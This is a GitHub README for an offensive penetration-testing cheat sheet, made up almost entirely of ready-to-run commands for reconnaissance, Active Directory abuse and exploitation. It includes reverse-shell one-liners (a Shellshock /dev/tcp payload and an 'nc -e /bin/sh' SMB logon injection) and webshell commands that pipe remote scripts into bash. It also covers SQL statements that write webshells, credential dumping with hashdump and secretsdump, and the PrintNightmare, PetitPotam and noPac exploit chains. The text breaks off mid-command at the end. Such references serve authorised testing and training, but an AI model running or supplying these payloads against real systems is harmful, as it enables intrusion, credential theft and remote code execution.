jwardsmith/Penetration-Testing

GitHub: jwardsmith/Penetration-Testing

一份覆盖渗透测试全流程的命令与工具速查清单,帮助安全团队快速执行信息收集、漏洞利用与横向移动。

Stars: 8 | Forks: 3

# Penetration Testing ## Overview 1. - [Passive Enumeration](#1---passive-enumeration) 2. - [Active Enumeration](#2---active-enumeration) 3. - [Exploitation](#3---exploitation) 4. - [Lateral Movement](#4---lateral-movement) 5. - [Privilege Escalation](#5---privilege-escalation) 6. - [Brute Force](#6---brute-force) 7. - [Password Dumping](#7---password-dumping) 8. - [File Transfers](#8---file-transfers) 9. - [Restricted Shell Escapes](#9---restricted-shell-escapes) 10. - [Shells](#10---shells) 11. - [Evasion](#11---evasion) 12. - [Online Resources](#12---online-resources) 13. - [Browser Plugins](#13---browser-plugins) 14. - [Exploits](#14---exploits) 15. - [Exploit Research](#15---exploit-research) ## #1. - Passive Enumeration - Searchcode https://searchcode.com/ - Shodan https://www.shodan.io/ $ for i in $(cat ip-addresses.txt);do shodan host $i;done - Certificate Search https://crt.sh/ $ curl -s https://crt.sh/\?q\=\&output\=json | jq . $ curl -s https://crt.sh/\?q\=\&output\=json | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u - Google Dorks https://www.exploit-db.com/google-hacking-database intext: inurl:amazonaws.com intext: inurl:blob.core.windows.net - Whois https://domain.glass/ https://whois.domaintools.com/ - Cloud Bucket Search https://buckets.grayhatwarfare.com/ - ASN/IP Registrars https://www.iana.org/ https://www.arin.net/ https://www.ripe.net/ https://bgp.he.net/ - Domain Registrars & DNS https://www.domaintools.com/ https://securitytrails.com/ https://lookup.icann.org/en https://viewdns.info/ - Social Media https://www.linkedin.com/ https://www.facebook.com/ https://www.instagram.com/ https://x.com/ - Cloud & Development Storage Spaces https://github.com/ - Breach Data Sources https://haveibeenpwned.com/ https://www.dehashed.com/ - Trufflehog https://github.com/trufflesecurity/truffleHog ## #2. - Active Enumeration - Ping $ for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done C:\> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply" PS C:\> 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"} - Fping https://fping.org/ fping -asgq 172.16.5.0/23 - Nmap $ sudo nmap --script-updatedb $ nmap -sn $ nmap -sC -sV -p- -Pn -A $ nmap -sC -sV -p- -Pn -A -sU $ nmap --top-ports=100 $ nmap --script vuln $ nmap -sV --script banner $ nmap -sV --packet-trace --reason $ nmap -S -e tun0 $ nmap -D RND:5 $ nmap --source-port $ nmap -oA scan $ nmap -iL hosts.txt -oA scan $ xsltproc target.xml -o target.html - Nessus $ dpkg -i Nessus-8.15.1-ubuntu910_amd64.deb $ sudo systemctl start nessusd.service https://localhost:8834 https://raw.githubusercontent.com/eelsivart/nessus-report-downloader/master/nessus6-report-downloader.rb ./nessus_downloader.rb - OpenVAS $ sudo apt-get install gvm && openvas $ gvm-setup $ gvm-start https://github.com/TheGroundZero/openvasreporting $ python3 -m openvasreporting -i report-2bf466b5-627d-4659-bea6-1758b43235b1.xml -f xlsx - Netcat $ nc -nv - TCPDump $ sudo tcpdump -i ens224 - Wireshark $ sudo -E wireshark - NetMiner https://www.netminer.com/en/product/netminer.php?ckattempt=1 - Living Off The Land (LOLBAS) C:\> net accounts C:\> net accounts /domain C:\> net user C:\> net user /domain C:\> net user /domain C:\> net localgroup C:\> net localgroup administrators C:\> net localgroup administrators /domain C:\> net group C:\> net group /domain C:\> net group "Domain Computers" /domain C:\> net group "Domain Controllers" /domain C:\> net group "Domain Admins" /domain C:\> net share C:\> net use x: \\ C:\> net view C:\> net view /all /domain[:] C:\> net view \computer /ALL C:\> net view /domain C:\> hostname C:\> [System.Environment]::OSVersion.Version C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn C:\> wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List C:\> wmic process list /format:list C:\> wmic ntdomain list /format:list C:\> wmic useraccount list /format:list C:\> wmic group list /format:list C:\> wmic sysaccount list /format:list https://gist.github.com/xorrior/67ee741af08cb1fc86511047550cdaf4 C:\> dsquery user C:\> dsquery computer C:\> dsquery * "CN=Users,DC=,DC=" C:\> dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl C:\> dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName C:\> ipconfig /all C:\> arp -a C:\> route print C:\> set C:\> echo %USERDOMAIN% C:\> echo %logonserver% C:\> systeminfo PS C:\> Get-Module PS C:\> Get-ExecutionPolicy -List PS C:\> Set-ExecutionPolicy Bypass -Scope Process PS C:\> Get-ChildItem Env: | ft Key,Value PS C:\> Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt PS C:\> powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); " - PowerView https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 PS C:\> Import-Module .\PowerView.ps1 PS C:\> Export-PowerViewCSV PS C:\> ConvertTo-SID PS C:\> Convert-NameToSid PS C:\> $sid=Convert-NameToSid "Domain Users" PS C:\> Get-DomainPolicy PS C:\> Get-DomainSPNTicket PS C:\> Get-Domain PS C:\> Get-DomainController PS C:\> Get-DomainUser PS C:\> Get-DomainUser * -spn | select samaccountname PS C:\> Get-DomainUser -SPN -Domain | select SamAccountName PS C:\> Get-DomainUser -Identity | select samaccountname,objectsid,memberof,useraccountcontrol |fl PS C:\> Get-DomainUser -Domain -Identity | select samaccountname,memberof PS C:\> Get-DomainUser -Identity | Get-DomainSPNTicket -Format Hashcat PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation PS C:\> Get-DomainUser -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes PS C:\> Get-DomainUser * | Select-Object samaccountname,description PS C:\> Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol PS C:\> Get-DomainComputer PS C:\> Get-DomainGroup PS C:\> Get-DomainOU PS C:\> Get-DomainSID PS C:\> Find-InterestingDomainAcl PS C:\> Get-DomainGroupMember PS C:\> Get-DomainFileServer PS C:\> Get-DomainDFSShare PS C:\> Get-DomainGPO PS C:\> Get-NetLocalGroup PS C:\> Get-NetLocalGroupMember PS C:\> Get-NetShare PS C:\> Get-NetSession PS C:\> Test-AdminAccess PS C:\> Find-DomainUserLocation PS C:\> Find-DomainShare PS C:\> Find-InterestingDomainShareFile PS C:\> Find-LocalAdminAccess PS C:\> Get-DomainTrust PS C:\> Get-ForestTrust PS C:\> Get-DomainForeignUser PS C:\> Get-DomainForeignGroupMember PS C:\> Get-DomainForeignGroupMember -Domain PS C:\> Get-DomainTrustMapping PS C:\> Get-DomainGroupMember -Identity "Domain Admins" -Recurse PS C:\> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName PS C:\> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid} PS C:\> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} PS C:\> Set-DomainUserPassword -Identity -AccountPassword $damundsenPassword -Credential $Cred -Verbose PS C:\> Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members '' -Credential $Cred2 -Verbose PS C:\> Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName PS C:\> Set-DomainObject -Credential $Cred2 -Identity -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose PS C:\> Set-DomainObject -Credential $Cred2 -Identity -Clear serviceprincipalname -Verbose PS C:\> Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members '' -Credential $Cred2 -Verbose PS C:\> $sid= "S-1-5-21-3842939050-3880317879-2865463114-1164" Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl PS C:\> Get-NetLocalGroupMember -ComputerName -GroupName "Remote Desktop Users"\ PS C:\> Get-DomainGPO | select displayname PS C:\> Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid PS C:\> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl PS C:\> Get-DomainUser -Domain | select SamAccountName PS C:\> Get-DomainGroup -Domain -Identity "Enterprise Admins" | select distinguishedname,objectsid - Active Directory Module PS C:\> Get-Module PS C:\> Import-Module ActiveDirectory PS C:\> Get-ADDomain PS C:\> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName PS C:\> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt PS C:\> Get-ADTrust -Filter * PS C:\> Get-ADGroup -Filter * | select name PS C:\> Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members PS C:\> Get-ADGroup -Identity "Backup Operators" PS C:\> Get-ADGroupMember -Identity "Backup Operators" PS C:\> $guid= "00299570-246d-11d0-a768-00aa006e0529" Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * | Select Name,DisplayName,DistinguishedName,rightsGuid | ?{$_.rightsGuid -eq $guid} | fl PS C:\> foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}} PS C:\> ConvertFrom-SddlString PS C:\> Get-GPO -All | Select DisplayName PS C:\> Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532 - SharpView PS C:\> .\SharpView.exe Get-DomainUser -Identity - BloodHound $ sudo bloodhound-python -u '' -p '' -ns -d -c all $ bloodhound-python -d -dc -c All -u -p $ zip -r mass_bh.zip *.json $ sudo neo4j start $ bloodhound PS C:\> .\SharpHound.exe -c All --zipfilename bloodhound https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/ - LAPSToolkit https://github.com/leoloobeek/lapstoolkit PS C:\> Find-LAPSDelegatedGroups PS C:\> Find-AdmPwdExtendedRights PS C:\> Get-LAPSComputers - FTP (port 21) $ ftp (anonymous:anonymous) ftp> dir ftp> cd ftp> get ftp> put ftp> exit ftp> passive # if ls is hanging $ openssl s_client -connect :21 -starttls ftp $ wget -m --no-passive ftp://anonymous:anonymous@ $ nmap -Pn -v -n -p80 -b anonymous:password@ # https://www.geeksforgeeks.org/what-is-ftp-bounce-attack/ $ hydra -L -p '' -f ftp https://lftp.yar.ru/ https://www.ncftp.com/ https://filezilla-project.org/ https://www.crossftp.com/ - SSH (port 22) $ ssh @ $ ssh @@ $ ssh @ -p $ chmod 600 id_rsa $ ssh -i id_rsa @ $ ssh @ -o PreferredAuthentications=password $ ssh-audit.py $ hydra -L -p '' -f ssh - Telnet (port 23) $ telnet - SMTP (port 25) $ telnet 25 VRFY root EXPN root EXPN all RCPT TO:root $ smtp-user-enum -M RCPT -U -D -t $ host -t MX $ dig mx | grep "MX" | grep -v ";" $ host -t A $ swaks --from --to --header 'Subject: Notification' --body 'Message' --server $ hydra -L -p '' -f smtp https://www.thunderbird.net/en-US/ https://www.claws-mail.org/ https://wiki.gnome.org/Apps/Geary https://www.getmailspring.com/ https://www.mutt.org/ https://mailutils.org/ https://github.com/mogaal/sendemail https://mxtoolbox.com/ - DNS (udp/port 53) $ host $ host -t MX $ host -t A $ dig ns @ $ dig mx @ $ dig txt @ $ dig CH TXT version.bind $ dig soa @ $ dig any @ $ dig axfr @ $ for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub. @ | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done $ dnsenum --dnsserver --enum -p 0 -s 0 -o found_subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt $ for i in $(cat subdomainlist.txt);do host $i | grep "has address" | grep | cut -d" " -f4 >> ip-addresses.txt;done $ subfinder -d -v $ fierce --domain $ ./subfinder -d -v $ adidnsdump -u \\ ldap:// $ adidnsdump -u \\ ldap:// -r https://dnsdumpster.com/ $ python sublist3r.py -d $ ./subbrute.py -s ./names.txt -r ./resolvers.txt # $ echo "" > ./resolvers.txt https://github.com/EdOverflow/can-i-take-over-xyz https://www.ettercap-project.org/ https://www.bettercap.org/ - TFTP (udp/port 69) $ tftp tftp> get tftp> put - HTTP/HTTPS (port 80/443) Right-Click -> View Page Source https:///robots.txt $ gobuster dir -w -u $ gobuster dir -w -u -x php,html $ gobuster vhost -w -u $ gobuster dns -w -d $ ffuf -u /FUZZ -w $ curl -IL $ curl -H 'User-agent: zerodiumsystem("curl ");' $ curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp//443 0>&1" http:///cgi-bin/user.sh $ feroxbuster -w -u $ wfuzz -c -w -u http://FUZZ. $ nikto -h $ eyewitness -f --web $ whatweb $ curl -v -X OPTIONS $ curl http:// --upload-file test.txt $ curl -X PUT http:///test.txt -d @test.txt $ curl -X PUT http:///test.txt --data-binary @cmdasp.aspx $ curl -X PUT http:///test.txt -d @cmdasp.aspx $ curl -X MOVE -H 'Destination:http:///cmdasp.aspx' http:///test.txt $ davtest -url http:// $ cadaver http:// dav:/ put cmdasp.aspx cmdasp.txt dav:/ put cmdasp.txt cmdasp.aspx - POP3 (port 110) $ telnet 110 USER admin PASS admin LIST RETR 1 $ hydra -L -p '' -f pop3 - RPCBIND (port 111) $ rpcinfo -p - MSRPC (port 135) $ wmiexec.py :''@ "" $ wmiexec.py /:''@ - SMB (port 137/139/445) $ smbclient -N -L $ smbclient -L $ smbclient -L -U $ smbclient \\\\\\c$ $ smbclient \\\\\\c$ -U $ smbclient /// -k -c ls -no-pass $ smbmap -H $ smbmap -H -u -p $ smbmap -H -u -p -d $ smbmap -H -u -p -d -R SYSVOL --dir-only $ smbmap -H -r $ smbmap -H --download "\file.txt" $ smbmap -H --upload test.txt "\file.txt" smb: \> logon "/=`nc -e /bin/sh`" smb: \> !ls $ rpcclient -U "" rpcclient $> querydominfo rpcclient $> getdompwinfo rpcclient $> enumdomusers rpcclient $> queryuser 0x457 $ for i in $(seq 500 1100);do rpcclient -N -U "" -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done $ samrdump.py msf> use auxiliary/scanner/smb/smb_version msf> use auxiliary/scanner/smb/smb_login msf> use auxiliary/scanner/smb/smb_ms17_010 msf> use exploit/windows/smb/ms17_010_psexec msf> use exploit/windows/smb/ms17_010_eternalblue msf> use exploit/windows/smb/ms08_067_netapi msf> use exploit/multi/samba/usermap_script msf> use exploit/windows/smb/psexec $ enum4linux -a $ enum4linux-ng.py -A -C -oA output $ crackmapexec smb --shares $ crackmapexec smb --shares -u '' -p '' $ crackmapexec smb -u -p '' $ crackmapexec smb -u -p '' --local-auth $ crackmapexec smb --shares -u -p '' $ crackmapexec smb -u -p '' -x 'whoami' --exec-method smbexec $ crackmapexec smb -u -p '' -X 'Get-Process' --exec-method smbexec $ crackmapexec smb -u -p '' --loggedon-users $ crackmapexec smb -u -p '' --users $ crackmapexec smb -u -p '' --groups $ crackmapexec smb -u -p '' --shares $ crackmapexec smb -u -p '' -M spider_plus --share $ crackmapexec smb -u -p '' --sam $ crackmapexec smb -u -p '' --pass-pol $ crackmapexec smb -u -H $ crackmapexec smb -L | grep gpp $ crackmapexec smb -u -p -M gpp_autologin $ impacket-psexec :''@ $ psexec.py /:''@ $ impacket-ntlmrelayx --no-http-server -smb2support -t # Ensure SMB = Off in /etc/responder/Responder.conf, and $ impacket-ntlmrelayx --no-http-server -smb2support -t -c 'powershell -e C:\> net use \\\ipc$ "" /u:"" C:\> net use \\\ipc$ "" /u:guest C:\> net use n: \\\ C:\> net use n: \\\ /user: PS C:\> New-PSDrive -Name "N" -Root "\\\" -PSProvider "FileSystem" PS C:\> New-PSDrive -Name "N" -Root "\\\" -PSProvider "FileSystem" -Credential (New-Object System.Management.Automation.PSCredential("",(ConvertTo-SecureString "" -AsPlainText -Force))) C:\> dir n: /a-d /s /b | find /c ":\" PS:\> (Get-ChildItem -File -Recurse | Measure-Object).Count $ sudo mount -t cifs -o username=plaintext,password=,domain=. /// $ mount -t cifs /// -o credentials= # credential file has to be structured per line: username=test password=test domain=. $ sudo responder -I tun0 $ hydra -L -p '' -f smb - IMAP (port 143) $ telnet 143 1 LOGIN username password 1 LIST "" * 1 FETCH all - SNMP (udp/port 161) $ snmpwalk -v 2c -c $ snmpwalk -v 2c -c public 1.3.6.1.2.1.1.5.0 $ snmpwalk -v 2c -c private 1.3.6.1.2.1.1.5.0 $ onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt $ braa @:.1.* - LDAP (port 389) $ ldapsearch -h -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength $ ldapsearch -h -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" $ python3 windapsearch.py --dc-ip -u "" -U $ python3 windapsearch.py --dc-ip -u \ -p --da $ python3 windapsearch.py --dc-ip -u \ -p -PU $ python ldapdomaindump.py -u 'DOMAIN\' -p '' - R-Services (port 512/513/514) $ rlogin -l $ rwho $ rusers -al - IPMI (udp/port 623) msf> use auxiliary(scanner/ipmi/ipmi_version) msf> use auxiliary(scanner/ipmi/ipmi_dumphashes) - CUPS (port 631) $ cupsctl ErrorLog="/etc/shadow" $ curl http://:631/admin/log/error_log? use multi/escalate/cups_root_file_read - Rsync (port 873) $ rsync -av --list-only rsync:// $ rsync -av --list-only rsync:/// $ rsync rsync://// $ rsync -av rsync:// - IMAPS (port 993) $ curl -k 'imaps://' --user : $ openssl s_client -connect :imaps - POP3S (port 995) $ openssl s_client -connect :pop3s $ sudo apt-get install evolution # https://www.youtube.com/watch?v=xelO2CiaSVs $ export WEBKIT_FORCE_SANDBOX=0 && evolution - MSSQL (port 1433) $ python3 mssqlclient.py /@ -windows-auth # will need to pip install . in the impacket directory to install properly $ impacket-mssqlclient @ -windows-auth C:\> sqlcmd -S SRVMSSQL\SQLEXPRESS -U -P '' -y 30 -Y 30 # if we use sqlcmd, we will need to use GO after our query to execute the SQL syntax C:\> sqlcmd -S -U -P '' -y 30 -Y 30 # if we use sqlcmd, we will need to use GO after our query to execute the SQL syntax C:\> sqlcmd -S -U .\\ -P '' -y 30 -Y 30 # if we use sqlcmd, we will need to use GO after our query to execute the SQL syntax $ sqsh -S -U -P '' -h $ sqsh -S -U .\\ -P '' -h $ mssql-cli -S -U -P SQL> SELECT name FROM master.dbo.sysdatabases SQL> SELECT name from sys.databases SQL> SELECT * FROM .INFORMATION_SCHEMA.TABLES SQL> USE ; SQL> SELECT name FROM sys.tables SQL> SELECT * FROM ; SQL> SELECT * from
where = ""; SQL> SELECT is_srvrolemember('sysadmin'); SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; SQL> EXEC xp_cmdshell "whoami"; SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE; SQL> EXEC DECLARE @OLE INT; DECLARE @FileID INT; EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT; EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1; EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, ''; EXECUTE sp_OADestroy @FileID; EXECUTE sp_OADestroy @OLE; GO; SQL> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents $ sudo responder -I tun0 # NTLMv2 $ sudo impacket-smbserver share ./ -smb2support SQL> EXEC master..xp_dirtree '\\\share\' SQL> EXEC master..xp_subdirs '\\\share\' SQL> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' SQL> SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin') SQL> SELECT IS_SRVROLEMEMBER('sysadmin', ''); SQL> SELECT sp.name FROM sys.server_principals sp JOIN sys.server_role_members srm ON sp.principal_id = srm.member_principal_id JOIN sys.server_principals rp ON srm.role_principal_id = rp.principal_id WHERE rp.name = 'sysadmin'; SQL> EXECUTE AS LOGIN = '' SQL> REVERT SQL> USE master; EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin') SQL> SELECT srvname, isremote FROM sysservers SQL> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [\SQLEXPRESS] SQL> SELECT * FROM OPENQUERY([LOCAL.TEST.LINKED.SRV], 'SELECT @@version'); SQL> EXECUTE ('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV] SQL> EXECUTE ('sp_configure ''show advanced options'', 1') AT [LOCAL.TEST.LINKED.SRV] SQL> EXECUTE ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV] SQL> EXECUTE ('sp_configure ''xp_cmdshell'',1') AT [LOCAL.TEST.LINKED.SRV] SQL> EXECUTE ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV] https://learn.microsoft.com/en-us/ssms/install/install sudo dpkg -i dbeaver-.deb && dbeaver & # https://github.com/dbeaver/dbeaver, https://www.youtube.com/watch?v=gU6iQP5rFMw - Oracle TNS (port 1521) $ wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-basic-linux.x64-21.4.0.0.0dbru.zip $ wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip $ sudo mkdir -p /opt/oracle $ sudo unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip $ sudo unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip $ export LD_LIBRARY_PATH=/opt/oracle/instantclient_21_4:$LD_LIBRARY_PATH $ export PATH=$LD_LIBRARY_PATH:$PATH $ source ~/.bashrc $ cd ~ $ git clone https://github.com/quentinhardy/odat.git $ cd odat/ $ pip install python-libnmap $ git submodule init $ git submodule update $ pip3 install cx_Oracle $ sudo apt-get install python3-scapy -y $ sudo pip3 install colorlog termcolor passlib python-libnmap $ sudo apt-get install build-essential libgmp-dev -y $ pip3 install pycryptodome $ ./odat.py -h $ ./odat.py all -s $ ./odat.py utlfile -s -d -U -P --sysdba --putFile $ sqlplus /@/ $ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig $ sqlplus /@/ as sysdba SQL> SELECT table_name from all_tables; SQL> SELECT * from user_role_privs; SQL> select name, password from sys.user$; - NFS (port 2049) $ showmount -e $ sudo mount -t nfs : -o nolock $ sudo umount $ sudo useradd -u - MySQL (port 3306) $ mysql -h -u root $ mysql -h -u root -p MySQL [(none)]> SELECT version(); MySQL [(none)]> SHOW databases; MySQL [(none)]> USE ; MySQL [(none)]> SHOW tables; MySQL [(none)]> SELECT * FROM
; MySQL [(none)]> SELECT * from
where = ""; MySQL [(none)]> SELECT "" INTO OUTFILE '/var/www/html/webshell.php' MySQL [(none)]> show variables like "secure_file_priv"; MySQL [(none)]> select LOAD_FILE("/etc/passwd"); https://dev.mysql.com/downloads/workbench/ sudo dpkg -i dbeaver-.deb && dbeaver & # https://github.com/dbeaver/dbeaver, https://www.youtube.com/watch?v=PeuWmz8S6G8 https://github.com/dbcli/mycli - RDP (port 3389) $ xfreerdp /v: $ xfreerdp /v: /u:Administrator $ xfreerdp /v: /u:Administrator /d: $ xfreerdp /v: /u:Administrator@test.local $ xfreerdp /v: /u:Administrator /pth: $ freerdp /v: /cert:ignore /u:Administrator /p:'' $ rdesktop -u -p $ rdp-sec-check.pl $ query user $ tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} # this method no longer works on Server 2019 $ reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f $ crowbar -b rdp -s -U -c '' $ hydra -L -p '' rdp - PostgreSQL (port 5432) $ psql -h -U -p =# \l =# \c secrets =# \dt =# SELECT * FROM
; - WinRM (port 5985) $ evil-winrm -i -u -p $ evil-winrm -i -u -H $ crackmapexec winrm -u -p '' $ netexec winrm -u -p - X11 (port 6000) $ cat .Xauthority | base64 $ echo AQAADHN<...SNIP...>S0xAoNm/oZZ4/ | base64 -d > /tmp/.Xauthority $ export XAUTHORITY=/tmp/.Xauthority $ w $ xwd -root -screen -silent -display :0 > /tmp/screen.xwd $ convert screen.xwd screen.png - Redis (port 6379) $ redis-cli -h :6379> select :6379> keys * :6379> get - MongoDB (port 27017/27117) $ ./mongo mongodb://:27017 > show dbs; > use ; > show collections; > db..find().pretty(); $ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);" $ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("")},{$set:{"x_shadow":""}})' ## #3. - Exploitation - Searchsploit $ searchsploit - Metasploit $ sudo msfdb init $ msfconsole msf6 > loadpath /usr/share/metasploit-framework/modules/ msf6 > reload_all msf6 > show exploits msf6 > show payloads msf6 > search exploit eternalblue msf6 > use exploit/windows/smb/ms17_010_psexec msf6 exploit(windows/smb/ms17_010_psexec) > info msf6 exploit(windows/smb/ms17_010_psexec) > options msf6 exploit(windows/smb/ms17_010_psexec) > advanced msf6 exploit(windows/smb/ms17_010_psexec) > show targets msf6 exploit(windows/smb/ms17_010_psexec) > show encoders msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0 msf6 exploit(windows/smb/ms17_010_psexec) > check msf6 exploit(windows/smb/ms17_010_psexec) > set autorunscript migrate -f msf6 exploit(windows/smb/ms17_010_psexec) > exploit msf6 exploit(windows/smb/ms17_010_psexec) > exploit -e shikata_ga_nai msf6 > sessions msf6 > sessions -i 1 msf6 > jobs msf6 > jobs kill 1 msf6 > route print msf6 > route add 192.168.1.0/24 11 msf6 > use post/multi/manage/autoroute - Meterpreter meterpreter > sysinfo meterpreter > getuid meterpreter > background meterpreter > search -f *pass*.txt meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\Users\\Public meterpreter > download c:\\Windows\\system32\\calc.exe /tmp/calc.exe meterpreter > shell meterpreter > getprivs meterpreter > use priv meterpreter > hashdump meterpreter > lsa_dump_sam meterpreter > lsa_dump_secrets meterpreter > use incognito meterpreter > list_tokens -u meterpreter > list_tokens -g meterpreter > impersonate_token \ meterpreter > steal_token meterpreter > drop_token meterpreter > execute -f -i meterpreter > execute -f -i -H -t meterpreter > rev2self meterpreter > getsystem meterpreter > ps meterpreter > migrate meterpreter > load kiwi meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.110 - Local File Inclusion (LFI) http:///?page=../../../../../../../../windows/system32/drivers/etc/hosts - Remote File Inclusion (RFI) sudo responder -I http:///?page=///somefile - Server Side Template Injection (SSTI) ${7*7} - Insecure Direct Object Reference (IDOR) http:///data/0 http:///data/1 http:///data/2 - Webshell http:///shell.php?cmd=id http:///shell.php?cmd=curl%20:8000/shell.sh|bash - Sqlmap $ sqlmap -u '' --cookie="PHPSESSID=" $ sqlmap -u '' --cookie="PHPSESSID=" --os-shell - Rogue-JNDI $ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,} | {base64,-d}|{bash,-i}" --hostname "" - Tomcat http://:/manager/html tomcat:s3cret use exploit/multi/http/tomcat_mgr_upload - PRTG Network Monitor C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.dat https://github.com/shk0x/PRTG-Network-Monitor-RCE/blob/master/prtg-exploit.sh use exploit/windows/http/prtg_authenticated_rce - NoPac https://github.com/Ridter/noPac $ sudo python3 scanner.py /: -dc-ip -use-ldap $ sudo python3 noPac.py /: -dc-ip -dc-host -shell --impersonate administrator -use-ldap $ sudo python3 noPac.py /: -dc-ip -dc-host --impersonate administrator -use-ldap -dump -just-dc-user /administrator - PrintNightmare https://github.com/cube0x0/CVE-2021-1675 $ pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install $ rpcdump.py @ | egrep 'MS-RPRN|MS-PAR' $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f dll > backupscript.dll $ sudo smbserver.py -smb2support CompData /path/to/backupscript.dll $ sudo python3 CVE-2021-1675.py /:@ '\\\CompData\backupscript.dll' - PetitPotam https://github.com/topotam/PetitPotam $ sudo ntlmrelayx.py -debug -smb2support --target http:///certsrv/certfnsh.asp --adcs --template DomainController $ python3 PetitPotam.py $ python3 /opt/PKINITtools/gettgtpkinit.py /\$ -pfx-base64 = dc01.ccache $ secretsdump.py -just-dc-user / -k -no-pass "$"@ $ klist $ python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 /$ $ secretsdump.py -just-dc-user $"@ -hashes 